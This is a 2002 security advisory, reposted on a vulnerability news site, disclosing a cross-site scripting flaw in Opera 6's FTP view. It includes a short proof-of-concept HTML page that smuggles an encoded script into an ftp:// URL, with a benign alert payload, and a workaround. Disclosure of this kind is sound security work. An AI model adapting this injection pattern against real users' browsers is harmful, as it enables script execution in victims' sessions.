Computer Security

Security Advisory: Opera FTP View Cross-Site Scripting Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Internet Explorer/Mozilla/Oper
a  local zone script execution via FTP folders

  Mozilla FTP View Cross-Site Scripting Vulnerability

  Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

From:Eiji James Yoshida <ptrs-ejy_(at)_bp.iij4u.or.jp>
Date:21.08.2002
Subject:Opera FTP View Cross-Site Scripting Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title:
~~~~~~~~~~~~~~~~~
Opera FTP View Cross-Site Scripting Vulnerability


Date:
~~~~~~~~~~~~~~~~~
4 August 2002


Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]


Risk:
~~~~~~~~~~~~~~~~~
Medium


Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04


Overview:
~~~~~~~~~~~~~~~~~
Opera allows running Malicious Scripts due to a bug in 'FTP view'.
If you click on a malicious link, the script embedded in URL will run.


Details:
~~~~~~~~~~~~~~~~~
This problem is in 'FTP view'.
The '<title>URL</title>' is not escaped.


Exploit code:
~~~~~~~~~~~~~~~~~
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp:
//%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)
%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp:
//[FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp:
//%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)
%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.
com/");</script>
</body>
</html>


Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html


Workaround:
~~~~~~~~~~~~~~~~~
Disable JavaScript.


Vendor status:
~~~~~~~~~~~~~~~~~
Opera Software ASA was notified on 30 June 2002.


- -------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik@geocities.co.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- -------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPU8TMjnqpMRtMot1EQJ1DwCgs1v96kQ5KN42NVjf3rjUQO6iWOMAoKEE
e1I1peQyP4eIEgAEIhMv+x67
=6Qcu
-----END PGP SIGNATURE-----


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru